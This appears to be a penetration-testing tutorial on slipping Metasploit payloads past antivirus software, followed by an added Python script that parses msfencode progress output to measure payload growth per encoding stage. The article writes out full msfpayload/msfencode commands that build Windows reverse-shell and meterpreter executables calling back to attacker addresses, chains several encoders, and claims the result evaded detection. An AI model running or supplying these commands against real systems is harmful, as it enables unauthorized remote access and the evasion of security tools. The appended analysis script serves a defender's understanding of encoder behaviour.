In the previous articles, we have seen how to create a simple backdoor for exploiting Windows machines.
The goal of your penetration test might be to test detection mechanisms in your organization, such as the intrusion detection
systems (IDS) or intrusion prevention systems (IPS). When you are performing a penetration test, nothing is more embarrassing
than being caught by antivirus software. How did your detection mechanisms respond to stealthy attacks? What did they catch
and, more importantly, what did they miss? If the attacker was successful, how is she hiding her presence on your organization’s
hosts?
One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. A common
misconception is that the antivirus engines are actually detecting the shellcode, and therefore, the best way to avoid antivirus
detection is to pick an encoder that the antivirus engine cannot handle, or encode many times. After all, those are both
prominent options of msfencode.
First of all, we’ll run a simple encoding of an MSF payload by importing raw output from msfpayload into msfencode to see how
the result affects our antivirus detection:
root@kali:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.132 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
When we test our payload with antivirus software, we see that it is detected.
Multi-encoding:
In the preceding example, the shikata_ga_nai encoding is polymorphic, meaning that the payload will change each time the
script is run. Of course, the payload that an antivirus product will flag is a mystery: Every time you generate a payload, the same
antivirus program can flag it once and miss it another time.
root@kali:/# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
Here we use five iterations of shikata_ga_nai, feeding the code in raw format into two iterations of alpha_upper encoding, and then on through the remaining stages of the chain until the final stage writes the executable.
This time, when we scan with antivirus software, we can see that we have slipped our payload past the antivirus engine.
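The four-stage chain above, parsed from its own progress lines, as an added example that is not part of the original article: the script splits the msfencode output into stages (the iteration counter restarts at 1 for every new msfencode in the pipe) and computes how many bytes each pass adds. The 64-byte threshold used to tell a fixed-size decoder stub from a whole-buffer expansion is an assumption of this example, as is the name of every function. What the numbers show a defender is that the length-preserving encoders (shikata_ga_nai, countdown) only prepend a small decoder stub on every pass, while alpha_upper roughly doubles the buffer on each pass, so stacking passes mostly grows the file and accumulates decoder stubs rather than changing what the payload does.

```python
"""Measure how each msfencode stage in a pipeline grows the payload."""
import re

# Constructed sample input: the progress lines msfencode printed for the
# four-stage chain in the article (copied from its output, not generated here).
MSFENCODE_LOG = """\
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
"""

LINE_RE = re.compile(
    r"^\[\*\] (?P<encoder>\S+) succeeded with size (?P<size>\d+) "
    r"\(iteration=(?P<iteration>\d+)\)$"
)

# Heuristic (assumption of this example): a per-iteration delta below this many
# bytes is treated as "only a decoder stub was prepended".
STUB_THRESHOLD = 64


def parse_stages(log, raw_size=None):
    """Split msfencode progress lines into chain stages.

    Each msfencode in the pipe prints one line per iteration and its counter
    restarts at 1, so an `iteration=1` line marks a stage boundary. Returns a
    list of dicts with the encoder name, the stage's input size (None for the
    first stage when the raw payload size is unknown) and the output size after
    every iteration of that stage.
    """
    stages = []
    prev_size = raw_size
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip anything that is not a progress line
        encoder, size = m["encoder"], int(m["size"])
        if int(m["iteration"]) == 1:
            stages.append({"encoder": encoder, "size_in": prev_size, "sizes": []})
        stages[-1]["sizes"].append(size)
        prev_size = size
    return stages


def iteration_growth(stage):
    """Bytes added by every iteration after the first within one stage."""
    sizes = stage["sizes"]
    return [later - earlier for earlier, later in zip(sizes, sizes[1:])]


def summarize(stages):
    """Per-stage view: iterations run, bytes in/out, and whether each extra pass
    adds a fixed-size stub or re-expands the whole buffer."""
    summary = []
    for stage in stages:
        growth = iteration_growth(stage)
        size_in, size_out = stage["size_in"], stage["sizes"][-1]
        if not growth:
            mode = None  # single iteration: nothing to compare against
        elif max(growth) < STUB_THRESHOLD:
            mode = "fixed-stub"  # length-preserving encoder, only a stub per pass
        else:
            mode = "expanding"  # e.g. alphanumeric encoders roughly double the buffer
        summary.append({
            "encoder": stage["encoder"],
            "iterations": len(stage["sizes"]),
            "size_in": size_in,
            "size_out": size_out,
            "ratio": round(size_out / size_in, 2) if size_in else None,
            "per_iteration": growth,
            "mode": mode,
        })
    return summary


if __name__ == "__main__":
    for row in summarize(parse_stages(MSFENCODE_LOG)):
        print(row)
```

Running the script prints one row per stage; the two shikata_ga_nai stages come out as 27 and 29 bytes per pass, countdown as 18, and alpha_upper as one 990-byte jump from 921 to 1911 bytes.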